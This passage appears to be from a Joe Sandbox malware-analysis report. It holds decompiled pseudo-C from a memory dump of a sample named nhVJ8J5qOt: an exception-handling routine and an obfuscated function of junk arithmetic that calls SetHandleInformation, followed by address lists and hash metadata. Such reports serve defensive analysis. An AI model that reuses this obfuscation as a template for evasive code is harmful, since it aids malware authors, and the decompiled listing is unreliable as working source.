                                                                                                                                                                                                                                                                            							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                                                                                                                                                                                                                                            							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                                                                                                                                                                                                                                                            							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                                                                                                                                                                                                                                                                            							if(_a28 == 0) {
                                                                                                                                                                                                                                                                            								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                                                                                                                                                                                                                                                                            								 *((long long*)(_a4 + 0x10)) =  *_a20;
                                                                                                                                                                                                                                                                            								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                                                                                                                                                                                                                                            								_t254 = _a4;
                                                                                                                                                                                                                                                                            								_t240 = _a24;
                                                                                                                                                                                                                                                                            								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                                                                                                                                                                                                                                                                            								 *(_a4 + 0x50) =  *_t240;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                                                                                                                                                                                                                                                                            								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                                                                                                                                                                                                                                                            								_t240 = _a24;
                                                                                                                                                                                                                                                                            								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                                                                                                                                                                                                                                                                            								 *(_a4 + 0x50) =  *_t240;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							E0037D3EE(_t254);
                                                                                                                                                                                                                                                                            							RaiseException(_t262, 0, 1,  &_a4);
                                                                                                                                                                                                                                                                            							_t256 = _a4;
                                                                                                                                                                                                                                                                            							if((_t256[2] & 0x00000010) != 0) {
                                                                                                                                                                                                                                                                            								 *_t265 =  *_t265 & 0xfffffffe;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							if((_t256[2] & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                            								 *_t265 =  *_t265 & 0xfffffffb;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							if((_t256[2] & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                            								 *_t265 =  *_t265 & 0xfffffff7;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							if((_t256[2] & 0x00000002) != 0) {
                                                                                                                                                                                                                                                                            								 *_t265 =  *_t265 & 0xffffffef;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							if((_t256[2] & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                            								 *_t265 =  *_t265 & 0xffffffdf;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t195 =  *_t256 & 0x00000003;
                                                                                                                                                                                                                                                                            							if(_t195 == 0) {
                                                                                                                                                                                                                                                                            								 *_t265 =  *_t265 & 0xfffff3ff;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_t206 = _t195 - 1;
                                                                                                                                                                                                                                                                            								if(_t206 == 0) {
                                                                                                                                                                                                                                                                            									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                                                                                                                                                                                                                                                                            									L55:
                                                                                                                                                                                                                                                                            									 *_t265 = _t209;
                                                                                                                                                                                                                                                                            									L58:
                                                                                                                                                                                                                                                                            									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                                                                                                                                                                                                                                                                            									if(_t199 == 0) {
                                                                                                                                                                                                                                                                            										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                                                                                                                                                                                                                                                                            										L64:
                                                                                                                                                                                                                                                                            										 *_t265 = _t202;
                                                                                                                                                                                                                                                                            										L65:
                                                                                                                                                                                                                                                                            										if(_a28 == 0) {
                                                                                                                                                                                                                                                                            											 *_t240 = _t256[0x14];
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											 *_t240 = _t256[0x14];
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										return _t202;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_t203 = _t199 - 1;
                                                                                                                                                                                                                                                                            									if(_t203 == 0) {
                                                                                                                                                                                                                                                                            										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                                                                                                                                                                                                                                                                            										goto L64;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_t202 = _t203 - 1;
                                                                                                                                                                                                                                                                            									if(_t202 == 0) {
                                                                                                                                                                                                                                                                            										 *_t265 =  *_t265 & 0xfffff3ff;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									goto L65;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t210 = _t206 - 1;
                                                                                                                                                                                                                                                                            								if(_t210 == 0) {
                                                                                                                                                                                                                                                                            									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                                                                                                                                                                                                                                                                            									goto L55;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(_t210 == 1) {
                                                                                                                                                                                                                                                                            									 *_t265 =  *_t265 | 0x00000c00;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							goto L58;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(_t175 == 0x200) {
                                                                                                                                                                                                                                                                            							_t250 = _a4;
                                                                                                                                                                                                                                                                            							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                                                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(_t175 == 0x300) {
                                                                                                                                                                                                                                                                            							 *_a4 =  *_a4 & 0xffffffe3;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_t172 == 0x800) {
                                                                                                                                                                                                                                                                            						_t257 = _a4;
                                                                                                                                                                                                                                                                            						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                                                                                                                                                                                                                                                                            						goto L26;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_t172 == 0xc00) {
                                                                                                                                                                                                                                                                            						 *_a4 =  *_a4 | 0x00000003;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                                                            0x0037cfc4
                                                                                                                                                                                                                                                                            0x0037cfcb
                                                                                                                                                                                                                                                                            0x0037cfd0
                                                                                                                                                                                                                                                                            0x0037cfd6
                                                                                                                                                                                                                                                                            0x0037cfd9
                                                                                                                                                                                                                                                                            0x0037cfdf
                                                                                                                                                                                                                                                                            0x0037cfe4
                                                                                                                                                                                                                                                                            0x0037cfe9
                                                                                                                                                                                                                                                                            0x0037cfe9
                                                                                                                                                                                                                                                                            0x0037cfef
                                                                                                                                                                                                                                                                            0x0037cff4
                                                                                                                                                                                                                                                                            0x0037cff9
                                                                                                                                                                                                                                                                            0x0037cff9
                                                                                                                                                                                                                                                                            0x0037d000
                                                                                                                                                                                                                                                                            0x0037d005
                                                                                                                                                                                                                                                                            0x0037d00a
                                                                                                                                                                                                                                                                            0x0037d00a
                                                                                                                                                                                                                                                                            0x0037d011
                                                                                                                                                                                                                                                                            0x0037d016
                                                                                                                                                                                                                                                                            0x0037d01b
                                                                                                                                                                                                                                                                            0x0037d01b
                                                                                                                                                                                                                                                                            0x0037d022
                                                                                                                                                                                                                                                                            0x0037d027
                                                                                                                                                                                                                                                                            0x0037d02c
                                                                                                                                                                                                                                                                            0x0037d02c
                                                                                                                                                                                                                                                                            0x0037d034
                                                                                                                                                                                                                                                                            0x0037d044
                                                                                                                                                                                                                                                                            0x0037d056
                                                                                                                                                                                                                                                                            0x0037d068
                                                                                                                                                                                                                                                                            0x0037d07b
                                                                                                                                                                                                                                                                            0x0037d08d
                                                                                                                                                                                                                                                                            0x0037d095
                                                                                                                                                                                                                                                                            0x0037d09a
                                                                                                                                                                                                                                                                            0x0037d09f
                                                                                                                                                                                                                                                                            0x0037d09f
                                                                                                                                                                                                                                                                            0x0037d0a6
                                                                                                                                                                                                                                                                            0x0037d0ab
                                                                                                                                                                                                                                                                            0x0037d0ab
                                                                                                                                                                                                                                                                            0x0037d0b2
                                                                                                                                                                                                                                                                            0x0037d0b7
                                                                                                                                                                                                                                                                            0x0037d0b7
                                                                                                                                                                                                                                                                            0x0037d0be
                                                                                                                                                                                                                                                                            0x0037d0c3
                                                                                                                                                                                                                                                                            0x0037d0c3
                                                                                                                                                                                                                                                                            0x0037d0ca
                                                                                                                                                                                                                                                                            0x0037d0cf
                                                                                                                                                                                                                                                                            0x0037d0cf
                                                                                                                                                                                                                                                                            0x0037d0d9
                                                                                                                                                                                                                                                                            0x0037d0db
                                                                                                                                                                                                                                                                            0x0037d115
                                                                                                                                                                                                                                                                            0x0037d0dd
                                                                                                                                                                                                                                                                            0x0037d0e2
                                                                                                                                                                                                                                                                            0x0037d106
                                                                                                                                                                                                                                                                            0x0037d10e
                                                                                                                                                                                                                                                                            0x0037d102
                                                                                                                                                                                                                                                                            0x0037d102
                                                                                                                                                                                                                                                                            0x0037d118
                                                                                                                                                                                                                                                                            0x0037d11f
                                                                                                                                                                                                                                                                            0x0037d121
                                                                                                                                                                                                                                                                            0x0037d143
                                                                                                                                                                                                                                                                            0x0037d14b
                                                                                                                                                                                                                                                                            0x0037d14e
                                                                                                                                                                                                                                                                            0x0037d14e
                                                                                                                                                                                                                                                                            0x0037d150
                                                                                                                                                                                                                                                                            0x0037d150
                                                                                                                                                                                                                                                                            0x0037d15b
                                                                                                                                                                                                                                                                            0x0037d161
                                                                                                                                                                                                                                                                            0x0037d166
                                                                                                                                                                                                                                                                            0x0037d16d
                                                                                                                                                                                                                                                                            0x0037d1a7
                                                                                                                                                                                                                                                                            0x0037d1b2
                                                                                                                                                                                                                                                                            0x0037d1b8
                                                                                                                                                                                                                                                                            0x0037d1bb
                                                                                                                                                                                                                                                                            0x0037d1be
                                                                                                                                                                                                                                                                            0x0037d1ca
                                                                                                                                                                                                                                                                            0x0037d1d2
                                                                                                                                                                                                                                                                            0x0037d16f
                                                                                                                                                                                                                                                                            0x0037d172
                                                                                                                                                                                                                                                                            0x0037d17e
                                                                                                                                                                                                                                                                            0x0037d184
                                                                                                                                                                                                                                                                            0x0037d18a
                                                                                                                                                                                                                                                                            0x0037d18d
                                                                                                                                                                                                                                                                            0x0037d196
                                                                                                                                                                                                                                                                            0x0037d196
                                                                                                                                                                                                                                                                            0x0037d1d5
                                                                                                                                                                                                                                                                            0x0037d1e3
                                                                                                                                                                                                                                                                            0x0037d1e9
                                                                                                                                                                                                                                                                            0x0037d1f0
                                                                                                                                                                                                                                                                            0x0037d1f2
                                                                                                                                                                                                                                                                            0x0037d1f2
                                                                                                                                                                                                                                                                            0x0037d1f9
                                                                                                                                                                                                                                                                            0x0037d1fb
                                                                                                                                                                                                                                                                            0x0037d1fb
                                                                                                                                                                                                                                                                            0x0037d202
                                                                                                                                                                                                                                                                            0x0037d204
                                                                                                                                                                                                                                                                            0x0037d204
                                                                                                                                                                                                                                                                            0x0037d20b
                                                                                                                                                                                                                                                                            0x0037d20d
                                                                                                                                                                                                                                                                            0x0037d20d
                                                                                                                                                                                                                                                                            0x0037d214
                                                                                                                                                                                                                                                                            0x0037d216
                                                                                                                                                                                                                                                                            0x0037d216
                                                                                                                                                                                                                                                                            0x0037d223
                                                                                                                                                                                                                                                                            0x0037d226
                                                                                                                                                                                                                                                                            0x0037d25d
                                                                                                                                                                                                                                                                            0x0037d228
                                                                                                                                                                                                                                                                            0x0037d228
                                                                                                                                                                                                                                                                            0x0037d22b
                                                                                                                                                                                                                                                                            0x0037d256
                                                                                                                                                                                                                                                                            0x0037d24b
                                                                                                                                                                                                                                                                            0x0037d24b
                                                                                                                                                                                                                                                                            0x0037d25f
                                                                                                                                                                                                                                                                            0x0037d267
                                                                                                                                                                                                                                                                            0x0037d26a
                                                                                                                                                                                                                                                                            0x0037d289
                                                                                                                                                                                                                                                                            0x0037d28e
                                                                                                                                                                                                                                                                            0x0037d28e
                                                                                                                                                                                                                                                                            0x0037d290
                                                                                                                                                                                                                                                                            0x0037d295
                                                                                                                                                                                                                                                                            0x0037d2a1
                                                                                                                                                                                                                                                                            0x0037d297
                                                                                                                                                                                                                                                                            0x0037d29a
                                                                                                                                                                                                                                                                            0x0037d29a
                                                                                                                                                                                                                                                                            0x0037d2a6
                                                                                                                                                                                                                                                                            0x0037d2a6
                                                                                                                                                                                                                                                                            0x0037d26c
                                                                                                                                                                                                                                                                            0x0037d26f
                                                                                                                                                                                                                                                                            0x0037d27e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037d27e
                                                                                                                                                                                                                                                                            0x0037d271
                                                                                                                                                                                                                                                                            0x0037d274
                                                                                                                                                                                                                                                                            0x0037d276
                                                                                                                                                                                                                                                                            0x0037d276
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037d274
                                                                                                                                                                                                                                                                            0x0037d22d
                                                                                                                                                                                                                                                                            0x0037d230
                                                                                                                                                                                                                                                                            0x0037d246
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037d246
                                                                                                                                                                                                                                                                            0x0037d235
                                                                                                                                                                                                                                                                            0x0037d237
                                                                                                                                                                                                                                                                            0x0037d237
                                                                                                                                                                                                                                                                            0x0037d235
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037d226
                                                                                                                                                                                                                                                                            0x0037d128
                                                                                                                                                                                                                                                                            0x0037d136
                                                                                                                                                                                                                                                                            0x0037d13e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037d13e
                                                                                                                                                                                                                                                                            0x0037d12c
                                                                                                                                                                                                                                                                            0x0037d131
                                                                                                                                                                                                                                                                            0x0037d131
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037d12c
                                                                                                                                                                                                                                                                            0x0037d0e9
                                                                                                                                                                                                                                                                            0x0037d0f7
                                                                                                                                                                                                                                                                            0x0037d0ff
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037d0ff
                                                                                                                                                                                                                                                                            0x0037d0ed
                                                                                                                                                                                                                                                                            0x0037d0f2
                                                                                                                                                                                                                                                                            0x0037d0f2
                                                                                                                                                                                                                                                                            0x0037d0ed

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0037CFB1,?,?,00000008,?,?,0037C1CC,00000000), ref: 0037D1E3
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                            • Opcode ID: c8f35111687ee3a0f91f9a228031f1563820787b31f00e8a85aefcdd77ba5f88
                                                                                                                                                                                                                                                                            • Instruction ID: fd4173bd0a7e772537db87b4c6f8c91c88ac0042c3247fe1a0bab46a8747aeed
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8f35111687ee3a0f91f9a228031f1563820787b31f00e8a85aefcdd77ba5f88
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60B11B315106099FD726CF28C48AB657BB1FF45364F66C658E89ECF2A2C339D992CB40
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                                                                                                                                            			E00373370(intOrPtr _a4, intOrPtr _a12, signed int _a16, signed int _a24) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                                                                                                                            				long _v64;
                                                                                                                                                                                                                                                                            				long _v68;
                                                                                                                                                                                                                                                                            				void* _v72;
                                                                                                                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                                                                                                                            				signed int _t153;
                                                                                                                                                                                                                                                                            				intOrPtr _t154;
                                                                                                                                                                                                                                                                            				intOrPtr _t163;
                                                                                                                                                                                                                                                                            				intOrPtr _t173;
                                                                                                                                                                                                                                                                            				intOrPtr _t208;
                                                                                                                                                                                                                                                                            				intOrPtr _t230;
                                                                                                                                                                                                                                                                            				intOrPtr _t250;
                                                                                                                                                                                                                                                                            				intOrPtr _t251;
                                                                                                                                                                                                                                                                            				void* _t252;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v12 = _a16 ^ 0x00000327;
                                                                                                                                                                                                                                                                            				_v28 = _a16 + 0x29a;
                                                                                                                                                                                                                                                                            				_v32 = _a24 ^ 0x00000056;
                                                                                                                                                                                                                                                                            				_v8 = _a16 ^ 0x000025a0;
                                                                                                                                                                                                                                                                            				_v24 = _a16 + 0x82;
                                                                                                                                                                                                                                                                            				_v16 = _a16 + 0xe7;
                                                                                                                                                                                                                                                                            				_v76 = _a16 - 0x25a0;
                                                                                                                                                                                                                                                                            				_v60 = _a4 - 0x2674;
                                                                                                                                                                                                                                                                            				if(_v8 > _v16 - 0x54) {
                                                                                                                                                                                                                                                                            					L16:
                                                                                                                                                                                                                                                                            					return _v8 ^ 0x00000240;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if(_v16 < _v12 - 0x54) {
                                                                                                                                                                                                                                                                            					if(_v12 < (_v8 | 0x00002801)) {
                                                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                                                            						if(_v16 >= _v28 - 0x373) {
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_a12 + 0xf8)) =  *((intOrPtr*)(_a12 + 0x28)) +  *0x0040D3BC +  *((intOrPtr*)(_a12 + 0xf8)) - 0x172025;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_a12 + 0xf8)) =  *((intOrPtr*)(_a12 + 0xf8)) -  *(_a12 + 0xd0) - 0x32ba0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(_v16 >= (_v24 ^ 0x00000056)) {
                                                                                                                                                                                                                                                                            							_v8 = _v8 + 0x2687;
                                                                                                                                                                                                                                                                            							if( *0x00FBAF59 <=  *((intOrPtr*)(_a12 + 0x10c))) {
                                                                                                                                                                                                                                                                            								_t173 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            								 *(_t173 + 0x20) =  *(_a12 + 0x5c) ^ 0x30cec274;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v20 = _v12;
                                                                                                                                                                                                                                                                            					while(_v20 <= ( *(_a12 + 0xd0) -  *(_a12 + 0x5c) & 0x000026d4)) {
                                                                                                                                                                                                                                                                            						_t230 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t48 = _t230 + 0xe0; // 0x6
                                                                                                                                                                                                                                                                            						_v56 = (_v28 ^  *_t48) * _v32;
                                                                                                                                                                                                                                                                            						_v52 = 0x40d3a8;
                                                                                                                                                                                                                                                                            						_v48 = _v8 ^ 0x00002796;
                                                                                                                                                                                                                                                                            						_v44 = _v8 -  *0x40d45c - 0x2801;
                                                                                                                                                                                                                                                                            						_v40 =  *(_a12 + 0xd0) - _v24;
                                                                                                                                                                                                                                                                            						_t250 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_v36 =  *(_a12 + 0x8c) ^  *(_t250 + 0xbadbc1);
                                                                                                                                                                                                                                                                            						_push(_v36);
                                                                                                                                                                                                                                                                            						_t153 = E00385F40(_v56, _v52, _v48, _v44, _v40);
                                                                                                                                                                                                                                                                            						_t252 = _t252 + 0x18;
                                                                                                                                                                                                                                                                            						_v12 = _t153;
                                                                                                                                                                                                                                                                            						_v72 = _v60 & _v24 ^ 0x00002565;
                                                                                                                                                                                                                                                                            						_t154 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t78 = _t154 + 0xb4; // 0x367796e2
                                                                                                                                                                                                                                                                            						_v68 = ( *(_a12 + 0xd0) |  *_t78) -  *((intOrPtr*)(_a12 + 0xbadbe5));
                                                                                                                                                                                                                                                                            						_v64 =  *((intOrPtr*)(_a12 + 0x10)) - _v12;
                                                                                                                                                                                                                                                                            						SetHandleInformation(_v72, _v68, _v64);
                                                                                                                                                                                                                                                                            						_v20 = _v20 + 2;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				if( *(_a12 + 0x5c) >=  *((intOrPtr*)(_a12 + 0xc8))) {
                                                                                                                                                                                                                                                                            					 *(_a12 + 0x98) =  *(_a12 + 0x98) * 0xa2fd;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t251 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t163 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t30 = _t163 + 0xf8; // 0x1
                                                                                                                                                                                                                                                                            					_t208 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t208 + 0xf8)) = ( *((intOrPtr*)(_a12 + 0x10c)) -  *((intOrPtr*)(_t251 + 0xbadca9)) ^ 0xfff10ce5) +  *_t30;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                                                            			}






























                                                                                                                                                                                                                                                                            0x0037337f
                                                                                                                                                                                                                                                                            0x0037338b
                                                                                                                                                                                                                                                                            0x00373394
                                                                                                                                                                                                                                                                            0x0037339f
                                                                                                                                                                                                                                                                            0x003733ab
                                                                                                                                                                                                                                                                            0x003733b7
                                                                                                                                                                                                                                                                            0x003733c2
                                                                                                                                                                                                                                                                            0x003733ce
                                                                                                                                                                                                                                                                            0x003733da
                                                                                                                                                                                                                                                                            0x00373644
                                                                                                                                                                                                                                                                            0x00373650
                                                                                                                                                                                                                                                                            0x00373650
                                                                                                                                                                                                                                                                            0x003733e9
                                                                                                                                                                                                                                                                            0x00373468
                                                                                                                                                                                                                                                                            0x00373592
                                                                                                                                                                                                                                                                            0x0037359e
                                                                                                                                                                                                                                                                            0x003735d0
                                                                                                                                                                                                                                                                            0x003735f3
                                                                                                                                                                                                                                                                            0x003735f3
                                                                                                                                                                                                                                                                            0x00373602
                                                                                                                                                                                                                                                                            0x0037360c
                                                                                                                                                                                                                                                                            0x0037362e
                                                                                                                                                                                                                                                                            0x0037363b
                                                                                                                                                                                                                                                                            0x00373641
                                                                                                                                                                                                                                                                            0x00373641
                                                                                                                                                                                                                                                                            0x0037362e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00373602
                                                                                                                                                                                                                                                                            0x00373471
                                                                                                                                                                                                                                                                            0x0037347f
                                                                                                                                                                                                                                                                            0x0037349d
                                                                                                                                                                                                                                                                            0x003734a6
                                                                                                                                                                                                                                                                            0x003734b0
                                                                                                                                                                                                                                                                            0x003734b3
                                                                                                                                                                                                                                                                            0x003734c3
                                                                                                                                                                                                                                                                            0x003734d5
                                                                                                                                                                                                                                                                            0x003734e4
                                                                                                                                                                                                                                                                            0x003734fa
                                                                                                                                                                                                                                                                            0x0037350b
                                                                                                                                                                                                                                                                            0x00373511
                                                                                                                                                                                                                                                                            0x00373526
                                                                                                                                                                                                                                                                            0x0037352b
                                                                                                                                                                                                                                                                            0x0037352e
                                                                                                                                                                                                                                                                            0x0037353d
                                                                                                                                                                                                                                                                            0x00373543
                                                                                                                                                                                                                                                                            0x0037354e
                                                                                                                                                                                                                                                                            0x00373563
                                                                                                                                                                                                                                                                            0x00373578
                                                                                                                                                                                                                                                                            0x00373587
                                                                                                                                                                                                                                                                            0x0037347c
                                                                                                                                                                                                                                                                            0x0037347c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0037347f
                                                                                                                                                                                                                                                                            0x003733fa
                                                                                                                                                                                                                                                                            0x00373451
                                                                                                                                                                                                                                                                            0x003733fc
                                                                                                                                                                                                                                                                            0x0037340e
                                                                                                                                                                                                                                                                            0x00373428
                                                                                                                                                                                                                                                                            0x0037342d
                                                                                                                                                                                                                                                                            0x00373433
                                                                                                                                                                                                                                                                            0x00373439
                                                                                                                                                                                                                                                                            0x00373439
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetHandleInformation.KERNEL32(?,?,?), ref: 00373587
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HandleInformation
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1064748128-0
                                                                                                                                                                                                                                                                            • Opcode ID: 79e8dfe7d4d2a4e9bb266772c486e10849de22dfab16b9dfd54c8c6069fdc171
                                                                                                                                                                                                                                                                            • Instruction ID: 5856e6c1ac3b9a579f7b9703ce0efece3e18d40dc1cd398300c5b356a8b18238
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79e8dfe7d4d2a4e9bb266772c486e10849de22dfab16b9dfd54c8c6069fdc171
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64912C70A0020ACFDB08CF98C594AAEB7B1FF88300F208679E919AB385D734E955CF54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                                                                            			E003883A0(intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16, signed int _a20) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
